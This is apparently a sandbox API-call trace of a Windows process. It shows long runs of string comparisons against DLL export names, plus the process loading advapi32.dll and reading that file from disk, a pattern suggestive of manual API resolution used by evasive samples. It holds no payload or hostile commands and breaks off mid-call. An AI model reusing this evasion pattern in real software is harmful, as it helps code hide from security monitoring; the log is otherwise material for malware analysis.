1 [0093.585] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0093.585] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0093.585] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0093.586] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0093.586] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0093.586] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0093.586] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.586] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0093.586] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.586] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0093.587] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0093.588] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0093.589] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0093.589] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0093.590] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0093.853] GetProcessHeap () returned 0x430000 [0093.853] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x411c040 | out: hHeap=0x430000) returned 1 [0093.864] GetProcessHeap () returned 0x430000 [0093.865] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449040 [0093.867] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0093.867] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0093.867] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0093.867] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0093.868] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0093.868] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0093.868] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0093.868] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0093.869] GetProcessHeap () returned 0x430000 [0093.869] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa3ef0) returned 0x2d52010 [0093.870] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0093.870] ReadFile (in: hFile=0x140, lpBuffer=0x2d52010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d52010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0093.878] CloseHandle (hObject=0x140) returned 1 [0093.878] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0093.879] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0093.879] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0093.879] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0093.879] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0093.879] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0093.879] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0093.879] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0093.879] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0094.059] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0094.059] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0094.059] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0094.060] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0094.060] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0094.060] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0094.060] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.061] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0094.062] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.063] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0094.064] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0094.064] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0094.064] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0094.064] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0094.064] lstrcmpA 